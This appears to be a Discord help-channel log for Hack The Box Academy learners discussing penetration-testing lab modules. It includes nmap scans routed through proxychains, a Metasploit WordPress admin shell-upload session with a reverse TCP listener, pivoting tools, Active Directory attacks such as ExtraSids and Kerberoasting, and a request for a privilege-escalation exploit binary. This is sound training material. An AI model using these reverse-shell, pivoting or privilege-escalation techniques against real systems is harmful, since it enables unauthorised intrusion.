#modules

1 messages · Page 418 of 1

quasi wave
#

or what am I doing wrong here?

#

this is for question 3

#

can someone help me out here?

soft moon
#

I haven't started that module although you could increase nmap timing with -T (higher is faster 5, but IRL I think IDS/IPS (firewalls etc etc) could pick up on the speed increase)

quasi wave
#

other scans got all filtered results that's the only scan that shows 64 hosts up instead of 255

#

or where any ports are not filtered

#

ya I am wondering if maybe I should just wait this one out

soft moon
#

well now that module sounds real fun hahahaha I wish I could be more helpful but still a noob

soft moon
quasi wave
soft moon
#

😮

quasi wave
#

so I know that but you can expand the time a certain number of times

#

and then they just force you to start a new instance

bitter dome
soft moon
#

it can happen

quasi wave
#

I'm using a VM with VPN tho

soft moon
#

happened to me earlier on hahahaha time limits lol

fathom pendant
#

Don't spoil info for modules above t0

bitter dome
#

And you just expand the time in the browser for the target right?

quasi wave
fathom pendant
#

ICMP and socks proxy don't tend to get along

quasi wave
#

@fathom pendant can you tell me if I'm doing the module wrong and if so what am I doing wrong?

#

or do I just need to wait it out

safe star
rose stratus
#

Hello, I'm on Module Active Directory Enumeration & Attacks and stuck on Question " Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain." Can anyone help?

fathom pendant
#

I haven't touched that module in a while

quasi wave
fathom pendant
fathom pendant
rose stratus
quasi wave
soft moon
#

that reminds me of a meme

quasi wave
#

I have tried a whole bunch of scans and chatting it

fathom pendant
quasi wave
#

Sorry typo

fathom pendant
#

Well you reposting would include spoiler info, you can drop the scan info and just explain your issue

quasi wave
#

Ok thanks

fathom pendant
#

Instead of copying the whole log

quasi wave
#

So just everything after the command?

#

And vaguely describe what I’m doing?

fathom pendant
#

Yep, don't forget the module and section

quasi wave
#

ok thanks

#

hi so this is for question 3 of the skills assessment section for pivoting, tunneling, and port forwarding. I am trying to route everything through proxychains in order to get it through the pivot server in the section. I already know how to ssh into the pivot server so that's not the issue. the issue is my scans tend to either take forever or show every single host as up with all ports filtered.

In order to bypass the firewall, I changed the scan in order to not show all hosts as up with all ports filtered. this slows the scan down but I'm wondering if even this is the right scan. To me, its more likely because about a quarter of the hosts in the subnet show as up but the scan is taking much longer and I don't know if I should keep waiting for the scan to finish or try a different scan:

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-21 15:10 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 0.04% done
Stats: 0:00:06 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 0.23% done
Stats: 0:00:10 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 0.39% done
Stats: 0:00:13 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 0.51% done
Stats: 0:00:17 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 0.66% done
Stats: 0:02:36 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 6.02% done; ETC: 15:53 (0:40:37 remaining)
Stats: 0:02:42 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 6.25% done; ETC: 15:53 (0:40:30 remaining)
Stats: 0:03:33 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 8.24% done; ETC: 15:53 (0:39:31 remaining)
Stats: 0:04:19 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 10.04% done; ETC: 15:53 (0:38:50 remaining)
Stats: 0:04:54 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 11.41% done; ETC: 15:53 (0:38:11 remaining)
Stats: 0:05:33 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 12.89% done; ETC: 15:53 (0:37:30 remaining)
Stats: 0:05:48 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 13.48% done; ETC: 15:53 (0:37:14 remaining)
Stats: 0:06:25 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 14.92% done; ETC: 15:53 (0:36:35 remaining)
Stats: 0:06:28 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 15.04% done; ETC: 15:53 (0:36:32 remaining)
Stats: 0:07:22 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 17.15% done; ETC: 15:53 (0:35:40 remaining)
Stats: 0:08:43 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 20.27% done; ETC: 15:53 (0:34:17 remaining)
Stats: 0:12:53 elapsed; 0 hosts completed (64 up), 64 undergoing Connect Scan
Connect Scan Timing: About 30.00% done; ETC: 15:53 (0:30:06 remaining)

That's the output from my scan (or most of it anyways). Do I have the right idea with this scan and should I wait for it to finish? I need the IPs of hosts that are up and connected to the pivot server from the internal network.

#

there's 254 hosts total in scan and since 64 are up I think that means its hopefully not gonna just show me all results as filtered right?

#

the 254 hosts total is my estimate for the size of the scan. theoretically, I could have scanned a larger range but I'm scared the scan would never complete.

Can someone tell me what I'm doing wrong or if I'm actually right to be doing the scan the way I did it?

bitter dome
quasi wave
#

or at least who has done this lab

bitter dome
quasi wave
#

nope all of it is filtered after all of that

#

I'll get back to it later then

#

I ought to take a break now

cloud urchin
# quasi wave nope all of it is filtered after all of that

You never really asked a question. You just said you were stuck on question 3 and showed your scan taking forever. You didn't provide context as to why you're running this scan and you seem to assume it's required. Maybe it's not, but no one knows because you didn't really say what you were trying to accomplish. If you're trying to find if hosts are up, there are other techniques the module mentioned beyond nmap that may help you.

#

If you're scanning 253 hosts and all 65,535 ports you're going to wait a long time to get those results back.

soft moon
#

fping any good? for hosts?

cloud urchin
#

with what?

proper aspen
#

Yo, quick question, for the red teaming ai; Applications of AI in InfoSec; Skills assessment, Ive submitted a 93% accuracy score and it wasnt accepted? Im kinda hoping that the 4GM RAM and 4 CPU's here wont take a week to train for anything higher. Any guidance?

cedar plume
#

Hello I need help with using web proxies sections covering:
Repeating requests
Burp intruder

For repeating requests i found both flags but when i try to submit them it says its wrong.

For Burp intruder im lost i followed the hint my set up for it is the same as explained on the page but it is still not working and all the pages have a 404 error code.

cloud urchin
#

No. Not what this discord is about. This is not a hacker for hire server.

daring gull
#

What it's than?

cloud urchin
daring gull
#

Oooooo

narrow mist
#

What are the recommended settings for generating ssh keys? I've seen a few examples of ssh-keygen on academy and all of them use slightly different settings.

cloud urchin
#

Probably depends on who is recommending the settings to you.

narrow mist
#

Are there some general guidelines on x algorithm is most commonly used nowadays? I have seen some instances where rsa with various bits are used or ed25519.

blazing loom
#

Seems like they would have an interest in having the most up to date docs

narrow mist
#

The takeaway I got from some articles I read is that some old clients might not support ed25519 (could they really not come up with a better name?)

#

But I don't know how old, old is

blazing loom
#

If you come across and old system then just generate a new key and use both. One fore the latest and greatest alg and one for old legacy.

narrow mist
#

yeah makes sense

#

would you actually be able to tell the performance benefits from using a different algorithm, I can't recall ever having to wait a significant amount of time for an ssh interaction

blazing loom
#

Nope, you won't notice a difference, its just the latest and greatest recommended.

quasi wave
#

I wanted to know if I had the right approach by proxy chaining nmap?

#

Or if I was using the wrong method

cold star
cloud urchin
quasi wave
#

But I see your point I’ll try something else

cloud urchin
#

well you still never really said what you're trying to do. you just said you're on question 3 and showed your nmap scan.

cold star
#

From the full module my favorite tool is sshuttle no need of proxychains just one command work done

pure seal
#

Hi, I'm working on the Attacking Common Applications module, Attacking Wordpress section.

I'm trying to use metasploit to gain a reverse shell on the target through the wp_admin_shell_upload exploit. I have manually checked and confirmed the credentials and that the user I have is an Administrator for the site. However, I can't seem to get the exploit to work:

LHOST => 10.10.14.186
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST blog.inlanefreight.local
VHOST => blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.129.247.196
RHOSTS => 10.129.247.196
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME ****
USERNAME => ****
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD ****
PASSWORD => ****
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 10.10.14.186:4444 
[*] Authenticating with WordPress using ****:****...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.

Am I missing something?

nocturne rock
#

Im still here. Dying. Everything else is done, still stuck in stage 2 of the assessment for intro to windbg. If anyone has any tips im all ears. I don't know if anyone has beat this yet but i am starting to feel there maybe an issue with .run file.

quasi wave
#

But I’ll possibly try it

quasi wave
#

Currently I’m resting as my muscles hurt from two days of boxing

cold star
#

will join a traning center soon boxing or second option swimming

indigo plover
indigo plover
bitter dome
#

Hey all I had a question. Using the VM when you are finding the output of a flag. What have you found is the best way to copy and paste it into your local browser HTB to answer the questions.

#

They are a long string so I dont want to sit here and type it but copy and paste does not work between the local host and the VM

#

At least how I am doing it I guess

cloud urchin
#

works for me. i use vmware and vm tools are installed on the client. could also just open htb on the vm itself so you don't need to share clipboard.

bitter dome
#

Ya I use Vmware too but it doesnt work for me. I think thats a good work around thanks @cloud urchin Ill post if I find a better solution

cloud urchin
#

and you installed vmware tools on the client?

bitter dome
#

How do I verify?

cloud urchin
#

in vmware workstation go to vm -> install vmware tools

bitter dome
#

Ok so in the actual hypervisor outside of the VM > Edit Virtual machine settings > Options tab > Vmware tools
Right?

cloud urchin
#

in mine it's just vm -> install vmware tools

#

that inserts a disk you can install from

#
bitter dome
#

Mine is set to "use application default"

#

I am using the HTB Parrot Linux OS

cloud urchin
#

i don't use parrot so it may be different but it's still debian based. google is your friend here. but you need guest tools installed for your hypervisor to share the clipboard with your host i believe.

bitter dome
#

Thanks!

bitter dome
#

So I did the following incase anyone else is wondering:
1.
sudo apt update
sudo apt install open-vm-tools open-vm-tools-desktop -y

sudo reboot - Restart VM

Stop VM

Before starting your VM, do this in VMware Workstation or Player:
Go to your VM > Edit virtual machine settings
Click the Options tab
Go to Guest Isolation

Check both:
☑ Enable copy and paste
☑ Enable drag and drop
Click OK and start your VM.

Worked!

lucid grail
#

@cloud urchin Hello I have access Nibbles machine from VIP lab and solved it . However user.txt and root.txt flag for VIP are not applicable for Academy module. I am doing Academy module to complete the path . How can I verify that in Academy module and move forward my lesson . Please advise . Thanks again

fathom pendant
#

The academy module walks through the steps

lime cosmos
#

i can't crack the zip file hash with the specific wordlist

fathom pendant
#

Or try rockyou

rustic sage
#

for password cracking

lime cosmos
fathom pendant
#

What section?

cold star
#

Oof socks via rdp under pivoting was so time consuming as you have to transfer each tool and then antivirus keep deleting and then from rdp also you have to transfer to another rdp but yea it was good

lime cosmos
fathom pendant
cold star
#

nd we have to run powershell as admin else dll wont load

#

Just completed it 2m ago now gonna take some rest and then assessment

cedar ravine
#

Did you manage to fix this? I'm running to the issue too. I've looked ahead at the guides, and it should work.
I've also tried passthecert, gives me an ldap shell but the user is "None"

toxic meteor
#

I think the passthecert need when we have a certife for administrator and user the passthecert for add a user to administrator group for dump the hashes but for that user he is not an admin so I think the passthecert will not work. What do you think

#

yes why?

#

oh thank you bro

cedar ravine
#

What's happening?

#

can i join?

#

yeah

#

this is weird though, it doesn't mention anywhere that this discord is affiliated with hack thebox

cedar ravine
#

yep

[image: them asking me to connect my "wallet api" to the "rpc endpoint", whatever that means]

fathom pendant
#

are you offering support? i could really use some help with something

cedar ravine
#

I've reported him

fathom pendant
#

shhhh 😉

fathom pendant
fathom pendant
grave arch
#

hey guys

fathom pendant
proper aspen
#

Where can I get red teaming ai support?

fathom pendant
#

? you mean help with one of the modules or support because you think something is broken

#

if it's the first
module name - section name
what you're having issues with

#

if it's the latter
reach out to support

compact patrolBOT
proper aspen
#

Skill assessment module section 2

#

Ty

fathom pendant
#

skill assessment isn't a module

#

it's a section itself

proper aspen
#

Module 2 then skills assessment

fathom pendant
#

"module 2" isn't helpful either

proper aspen
#

Same support link?

fathom pendant
#

support is only if you think the module is bugged out.

proper aspen
#

Roger

acoustic thorn
#

Does anyone have any experience mitigating SeImpersonate. Are there other ways of mitigating beyond revoking privileges or disabling the print spooler?

tribal lark
#

Hi can someone help me on the web proxie module skill assessment. First question I tried what it told me to do but doesn’t work

#

I did the rest of the skill assessment just this one doesn’t seem to work for me

cold star
#

Hey, can anyone drop hint of pivoting and Skill assessment question 4

acoustic thorn
#

You should post the question with your attempt

tribal lark
#

Still nothing

cold star
#

I have tried using sshutle for pivot but to no avail can't ping or nmap anything under the pivot host

#

And the user creds I got earlier didn't work they say wrong creds

acoustic thorn
cold star
acoustic thorn
#

Ok but that means you're successfully reaching the host correct?

cold star
#

It might be problem with sshutle I am trying rpivot didn't work no python present

gaunt forge
#

I'm stuck on exploiting web vulnerabilities on thick clients in the attacking common applications section, and I can never compile my java file like it instructs me too.

#

Any ideas? I just get 31 errors each time I try

acoustic thorn
#

From the sound of it that should be working idk maybe there's something wrong with your command syntax

cold star
#

Is it something related to metasploit? As they have given hint do I have to launch a payload in my jump machine for pivoting?

acoustic thorn
#

In that case maybe the mlefay user doesn't have ssh permissions on the target

cold star
acoustic thorn
#

I thought you said sshuttle is working properly and that you preformed a ping sweep

cold star
acoustic thorn
#

Ah I see what you meant by that, having said that why do you think that sshuttle is configured properly if you can't reach your target ip

acoustic thorn
#

Maybe check iptables to see if sshuttle is successfully adding your target network

cold star
#

Wait I think I can also do ssh dynamic forwarding let me try that if sshutle is not working it might work

#

Wait I think it worked

#

ping is not working

acoustic thorn
#

Ping doesn't always work. Try a port scan

cold star
acoustic thorn
#

Thats definitely odd lol

#

Tbh I can't think of a reason why that might be

#

Though sometimes vms can be finicky or appear as up when they aren't

cold star
cold star
cloud urchin
#

@cold star Please do not post content from modules above tier 0

acoustic thorn
#

Glad you got it lol

cold star
acoustic thorn
#

Oh

cold star
#

It still all filterd ports

#

And I tried ssh on both the ips connection refused

acoustic thorn
#

Are there other live hosts on this network that you can check against or just this one?

cold star
acoustic thorn
#

Hmm I don't have the answer for you. I would suggest trying another method or restarting the environment if nothing else seems to be working

acoustic thorn
#

Also try using ligolo instead. Its good to learn other tools but ligolo is the best hands down

cold star
acoustic thorn
#

You should be able to transfer the ligolo agent with scp if you'd like to try that

cold star
#

I will try this again after a big nap because my mind is not working clearly studying in hack rhe box from 6 hours

acoustic thorn
#

Yeah ik the feeling godspeed 🫡

cold star
fathom pendant
#

only requires admin perms if you're trying to route a port < 1024

cold star
#

Gotcha will try it today after a good 5 hour sleep

sharp flax
#

Does anyone know how to find a password from a hash without using Hashcat? The wordlist definitely doesn’t contain the correct password. The password has 26 characters, so there are about 4 × 10²⁶ possible combinations.

fathom pendant
#

what module is this for?

sharp flax
#

Sorry, I put the question into section, it is from CTF not in the modules

fathom pendant
#

if it's from an active CTF, no one can help you. And since it's unrelated to htb academy modules, this isn't the right channel

sharp flax
#

Thanks

whole island
#

heey everyone

arctic ridge
#

Anyone around that can help with a technical issue for the VPN? Working on a module and the connections aren't letting me in

compact patrolBOT
fathom pendant
#

@arctic ridge ^

arctic ridge
#

Thank you

north locust
#

Hi guy, im stucking at the session Windows Event Logs which is belong to Windows Event Logs & Finding Evil module. i meet this question, and i dont understand that how the Event ID 4624 is related to the modification of the auditing settings?

#

I already find out the question but not base on the information that i have from Event ID 4624, just want to ask the relationship between these event

fathom pendant
eager ledge
#

Hello everyone

#

I need CVE-2020-0668.exe file. I am not in the position to build it myself. Please send it if you have it.

#

The file was present on the target machine C:\Tools in Kernel Exploits section of Windows Privilege Escalation module.

fathom pendant
eager ledge
#

I am using the Pwnbox provided by the HTB itself and not using my own machine. How can I download the files on my machine that are present on the pwnbox?

fathom pendant
#

so: you can spin up the lab that has it, and download it to your machine then spin up the other lab you may need to use it

#

also pwnbox has ssh running, so you can use scp to transfer files over

eager ledge
#

I can use x method to transfer file from target server(Windows) to PwnBox by HTB(Parrot). Is there a way I can transfer the file from PwnBox(Parrot) to my local?

#

Now that I have said it out loud. Its silly 😛

fathom pendant
#

scp; the pwnbox has an open-internet facing interface

#

:D

eager ledge
#

Thanks

fathom pendant
#

i'm sure you could probably start another service or whatever but that's other inherent risks

#

(but since it's pwnbox it's not as big a deal)

compact jacinth
#

Hi I’m doing the file upload attacks module and I’m at blacklist filters.
I have been trying to brute force the php extension but I can’t find a matching one. I have tried both the payloadallthething, php list and seclists web extension list. I created a shell with the echo hello world on my machine to see if I could execute on the specific extension but I can’t figure this out. Help please

charred ice
#

Hello
I am stuck with this error while working in web applications fuzzing module

This is the parameter fixing section (GET)

#

I crossed check the port and ip in my hosts file and they are both correct. I don’t know what the issue is

cloud urchin
charred ice
cloud urchin
#

@cold star Again, do not post content from modules above tier 0.

hardy sparrow
#

Hi I currently just finished the nmap IDS evasion hard module and I was wondering where I could find like write ups or solutions for these modules. I feel like I missed on how to actually figure out which port to scan and just got lucky by facerolling a number

nocturne wolf
#

Hi

cloud urchin
#

@nocturne wolf No. Not what this discord is about.

fathom pendant
fathom pendant
thorny kraken
#

Tbf i think the module did a good job at explaining this

west arrow
#

"Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer."
Is it normal to do a 1h long nmap scan of 172.16.5.15/16 ?
Im a bit lost on how to discover another active host.
Module link:https://academy.hackthebox.com/module/158/section/1441

#

never mind😆

spring trail
#

anyone finished Planning Machine?

cloud urchin
spring trail
cloud urchin
cold star
west arrow
cold star
west arrow
#

yep, im just trying to get the file onto my attack hostkek

cold star
#

yea we also have to create reverse tunnel there to dump lssass it will take time

west arrow
#

yep used drive feature from rdp, don't know why you need reverse tunnel

west arrow
#

yh

woven mist
#

Guys do you suggest more the penetration tester job Path or the bug bounty hunter

balmy apex
#

I am working in the beginning of pen test path, working through service scanning. I am on the question:

Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on

I am running the scan with nmap -sC -sV -p- <ip address> and I am on my 3rd attempt and it never returns a result before my target runs out of time and i have to respawn it.

Any help?

river grove
#

Would really appreciate some help on the last part of Advanced XSS and CSRF Exploitation assesment, I know what to do but I have some minor mistake in my syntax I think

cedar plume
#

why

rustic sage
#

Guys is my build of 1k dollar for my ethical hacking journey is good which includes ryzen 5 5600x, rtx 3060 12gb vram, 32gb ram and 1tb storage

#

??

glacial sparrow
#

probably ¯_(ツ)_/¯

cold star
cerulean grail
#

Could anybody please help me solve tge second question in the Automating Payloads & Delivery With Metasploit in the Shells & Payloads module?

I can tell you what I did and where I got stuck but I don't want to spoil it for others if that's not allowed.

cedar plume
#

Has anyone done the using web proxies modual if so what did you do for repeating requests because i have the two flags but it says its wrong when i try to submit it.

thick tendon
#

Anyone can help me tho get a TikTok account inactieve I need Somone for help

#

I have a good offer for the person that can help me out’!

thick tendon
#

Like THERE is a TikTok account thats needs to get blocked

#

But I need help for that

dark hedge
#

please keep the channel on topic, this channel is for discussion of HTB Academy modules

thick tendon
#

No thats not what I mean I mean can Somone help me tho do it by me self

dark hedge
#

i linked you the appropriate article, keep the channel on topic

soft moon
#

this channel is always full of interesting topic,
is there anyway to speed up or maybe potentially a better tool that smtp-user-enum?
this is for footprinting module SMTP section

molten pond
#

Hi everyone. Can anyone recommend a very basic CTF and is it on the main page or academy? Something very easy please.

soft moon
near orchid
#

hello i am in the Pentestin a nutshell module, on the linux pillaging tab. here i am being asked to run linpeas.sh while being root@ubuntu

molten pond
near orchid
#

however i cannot seem to run linpeas.sh nor am i able to download it

slow swift
#

After performing the Kerberoasting attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and look at the logs in Event Viewer. What is the ServiceSid of the webservice user? (Do you guys know how to get the answer for this ?)

fathom pendant
soft moon
slow swift
molten pond
soft moon
molten pond
edgy ember
#

Is anyone else facing issues connecting through RDP to any windows machines in the module? Since two days ago I've been constantly getting a black unresponsive screen when running xfreerdp or rdesktop... I clean installed both binaries but nothing really changed. Any idea of why this could be happening?

edgy ember
#

Yeah I mean that didn't solve the issue.. I tried with remmina now and I just got a black screen with reconnection attempts. Not sure what is really going on but I've downloaded the VPN files mutliple times now.

fathom pendant
#

Change to the tcp vpn

slow swift
edgy ember
soft moon
slow swift
heavy dome
#

in the Active Directory Enumeration & Attacks laboratory ACL Enumeration module I have great problems connecting in RDP, is this normal?

young gale
#

Password Attacks
Credential Hunting in Windows

What credentials does Bob use with WinSCP to connect to the file server? (Format: username:password, Case-Sensitive)

restive wing
#

Hello from Greece ,new here 🙂

strong stone
#

stuck on a setting up module

#

its y third time doing it again and again

cold star
strong stone
#

this part never comes ?

#

it takes me again to the installation .

empty mesa
#

Hey everyone. I'm pretty new to cybersecurity. If anyone has pro-tips or advice, I'd seriously appreciate it! My first module is Linux fundamentals.

unkempt stirrup
#

Hey from Spain!

narrow mist
# strong stone this part never comes ?

You install the os, then reboot, if it doesn't automatically try to boot what is on the disk at that point, either eject the installation media or change the boot order in whatever vm software you use.

strong stone
#

Okay

empty mesa
thorny kraken
#

#welcome use this to open up the other channels using the verification section

narrow mist
#

Anyone happen to know what application or config file contains the shortcut super + t to open the terminal in Parrot? I would like to change the terminal it launches. But it isn't a shortcut listed in the default mate shortcut tool, and the terminal that is being launched doesn't change if I set the defaults via the terminal or use the preferred applications tool.

thorny kraken
narrow mist
#

I have reconfigured update-alternatives for x-terminal-emulator to be the terminal that I want

#

and rebooted

spiral sapphire
#

Has anyone recently done the "password attacks" module? I'm on the password mutations section where I'd need to brute-force the user's password to log-in with SSH and the mutated list has 94k lines been running for +30 mins with Hydra and no hits. Should it really take this long? Hydra estimates it'll take 6 HOURS to go through the whole list !!!

shut vapor
spiral sapphire
strong stone
#

using oracle virtualbox manager parrotos

wide talon
#

hi?

#

can u help me getting started?

spiral sapphire
# shut vapor yes

If you don't mind, could you please give me a small nudge to the right direction? Highly appreciated 🤞

shut vapor
shut vapor
#

*hack the box Academy modules.

floral fulcrum
#

Hi currently on the MSSQL, Exchange, and SCCM Attacks Skills Assessment, im having trouble after getting to ||ron.mcginnis||. Have already tried enumerating for database links but im getting ||broken link || errors when using PowerUpSQL and impacket-mssqlclient is not showing anything particularly interesting. unsure if a ||relay attack || is out of scope here due to ||no signing ||

#

would really appreciate any help thanks!

solemn birch
#

Hey

#

Does anyone make any type of compiler tool as a text editor, Which supports all programming languages.

slow swift
#

I'm having a problem with the second question in the Windows Attack & Defense Module Kerberoasting section. I already cracked the password, but somehow, I'm struggling to connect to the machine in the second question. Do you have any tips?

narrow wind
#

Hey, i need help with the Attacking FTP section of Attacking Common Services Module. I did the full TCP port scan but there's no FTP service running on the machine?

zinc juniper
bright coral
#

Yes, TGS and new session key are encrypted with the old session key

#

Correct, you can look into the ccache with describeTicket from impacket.

pure forge
#

I am having trouble with uploading my working model for the final skills assessment of Applications of AI in InfoSec. The model performs with 90% accuracy locally but every time i upload the saved joblib file for evaluation, I am told it has 0% accuracy. I have refactored it many times to no avail. I did not have this issue with the other 3 models that I had to upload as i progressed through the course. Does anyone know what I could be doing wrong? i emailed HTB support but havent heard back and cant get past this module to continue the learning path

shut sparrow
#

I'm at what seems to be a simple part of the "Getting Started" module in the "Service Scanning" section. I'm trying to connect to the "user" share as Bob. I can list the shares just fine using the command:

smbclient -N -L \\(IP Address)

But when I try to use the command:

smbclient -U bob \\(IP Address)\users

To connect with Bob's credentials I was given (Bob:Welcome1). I get an error (NT_STATUS_NOT_FOUND)

My brain is deteriorating rapidly as I try to figure out what i'm doing wrong, please help if you're able

tribal lark
#

Can someone help me on the skill assessment question 1 of web proxies module I did all the other one but can’t seem the get the flag from the button

cloud urchin
#

@pale pendant This is not the place to advertise your online store.

tribal lark
shut sparrow
rustic sage
#

skid

tribal lark
#

@shut sparrow My bad I just checked did you use his password

shut sparrow
#

When I enter the command it asks for his password, I type in "Welcome1" and hit enter, thats when I get the error

shut vapor
# shut sparrow I also tried: smbclient -U bob ////(IP Address)//users Which didn't work either...

The whole double-backslash thing gets confusing fast. I think forward slashes work too without doubling them up (doubling up forward slashes will goof things up I'm pretty sure ////). Wrapping things in single quotes makes it 'literal' and helps too if do really need backslashes.

smbclient -U bob \\\\<ip_addr>\\users
smbclient -U bob //<ip_addr>/users
smbclient -U bob '\\<ip_addre>\users'
#

I like to test with echo when I get confused

user@boxen:~$ echo //
//
user@boxen:~$ echo \\
\
user@boxen:~$ echo '\\'
\\
user@boxen:~$ 
shut sparrow
tribal lark
#

@shut sparrow just copy the command from the page and change the ip

shut sparrow
shut vapor
#

is Bob capitalized? I don't know, you've got something else going on then if it's not confusion over the \\ // etc.

tribal lark
#

So make sure the password is correct 😎

shut sparrow
shut sparrow
shut sparrow
#

i'll have to try to set this up on my personal vm because my pwn box is long expired. so we'll see if I can figure that out to test

tame lagoon
#

I spent like an hour doing a ctf that isn't actually the ctf i started

#

i don't know why i thought using nmap on an ip of a generated ctf would give me 100% targets of the ctf i was doing

#

but now i have a flag from somewhere i don't know

shut sparrow
wicked frost
#

Hi, i'v just started academy, finished the "tutorial" and is currently working my way through linux fundamentals. after completing the first section of the tutorial there is a toast that says "first steps with HTB academy" "choose path". any takes on wether i should focus on a path or just focus on completing modules from the t0 and t1 tiers to start off, or should i focus more on specific modules tailored towards a specific path.. im currently subbing for the one that gives 200 cubes a month, and dont have to much to spare other then that. so im also somewhat limited by my cubes. any pointers / help to what to start with is very much appreciated. NOTE: i have background as junior backend dev if that is worth anything..

tribal lark
#

Based on ur background CBBH might be interesting to you

wicked frost
#

my first reaction was to chase CPTS cert. and that is my first milestone in my plan to break into cyber sec. but also find CBBH extremly intriguing, but read on a reddit post that CBBH was tailored more as an intro and to make a living as a BBH was mega hard.

tribal lark
#

What makes you say that ☺️

wicked frost
#

true true. if there is a decent overlap there is no reason not to do both 😄

#

@viscid osprey that was kinda my question also, what do i need to build a strong foundation? which modules do yall recommend to start off with ?

#

those kind of fundamentals 😄

tribal lark
#

@viscid osprey I do think that is a good suggestion tho

#

Even from a job side of things

wicked frost
#

Iv already done some networking courses on codecademy, currently working as an IT-assistant and trying to absorb as much as i can from my colleagues. also i have a network guru on speed dial for all my network related questions

#

Iv been eyeing those comptia certs. but dont know how to take them in my country of residence

waxen totem
#

Honestly, it just depends but I'd take the "Information Security Foundations" path and go from there

tribal lark
#

OSCP is super expensive tho and you learn abit more on CPTS

wicked frost
#

Thanks for all the solid advice, I think ill try focus on CPTS for now, and start there. Better to just do then think about doing. then i can adjust course as i go and get my feet wet.

tribal lark
#

💯 bro I get that I am hoping if I do CPTS my boss will get me OSCP 🤣

tacit topaz
#

Hello all, I'm trying to do the Skills Assessment of the Introduction to Digital Forensics module, I'm on the question 3 (finding the persistence registry key) I think I found it but doesn't work... Can I dm someone ?

wicked frost
#

i have cubes to buy the beginner course and promised mysefl that if i could get going on this journey for real, id invest into a yearly sub

tribal lark
shell stag
#

Hello friends. Not sure where best to report this, but I think the box for the skills assessment in the Cross Site Scripting (XSS) module is having some problems. When testing different payloads in the various fields, I'm just getting a connection reset error every time. I've tried resetting the box thrice and I'm connected via VPN. This has been happening since last night

tribal lark
shell stag
#

Thanks, I'll give it a try ~

#

Hmm. No luck yet... The problem occurs when trying to render http://{SERVER}/assessment/wp-comments-post(dot)php

waxen totem
#

Have you tried putting the target ip?

shell stag
#

Sorry for the confusion, I did use the complete ip while doing the lab, I just redacted it when posting, hahaha

#

@viscid osprey will do~

waxen totem
#

This is false

#

A lot of times especially for web modules like the one he's in

tribal lark
#

It says if you get a ip with a specific port it’s public

shell stag
#

This one actually is 10.x, so probably private... Redaction is just a reflex, probably not necessary in this case

#

No specific port in this case

tribal lark
#

I could be wrong it was mentioned in one of the modules

waxen totem
#

They wont exactly provide the port if it is private because the port would usually be the default or you'd have to port scan anyways

spring pollen
#

Hi, guys. I am stuck at the fisrt question of the skill assessment section of the module using crackmapexec. I established the tunnel with chisel and tried to run nxc on the internal network. However, it does not find anything. Does anyone have a clue on what I might be doing wrong?

marsh echo
lament hound
#

How goes it people! Having issues with the Attacking Splunk lab from the Attacking Common Applications lab. I have followed all of the steps on both the AttackLab & my own parrot VM. I edited the inputs.conf, rev.py, run.ps1 files, started nc listener, made sure the IPs and ports were correct, uploaded the "updater.tar.gz" file, but nc never gets the connection. Gace is 30 -35 minuts and still nothing.

daring stratus
#

Hi Guys, I am stuck at Sliver C2 Skills Assessment. I got the administrator access on SRV09 and got the dbuser creds for DC02 and able to login through mssqlclient.py, but when i try to upload the pivot exe file to DC02 it is giving me an error, file not found. I feel some AV is blocking the connections. Can you pls point me the direction to move forward?

hard tree
clear seal
# shell stag Thanks, I'll give it a try ~

I noticed some days the target boxes are sluggish. One day this week I was pulling my hair out because of this. The next day, the target boxes were flying. I think some days there is heavier network traffic than others.

bitter dome
#

Hi everyone, I’m currently stuck on the “Public Exploits” module in the Pentester path and could really use some help.

I’ve identified that the target is running WordPress 5.6.1 (via Nmap), and using Gobuster I discovered a /wp-admin login page. I was also able to enumerate a valid user with the following request:

curl -I http://94.237.59.174:58585/?author=1

However, I haven’t been able to gain shell access or locate the flag.txt yet. I feel like I might be overcomplicating the approach and would really appreciate any guidance or a nudge in the right direction—especially toward the path of least resistance.

Thanks in advance!

waxen totem
#

You might find something interesting

bitter dome
#

All I see is the wp-login and a getting started page

#

ah I found an idex

#

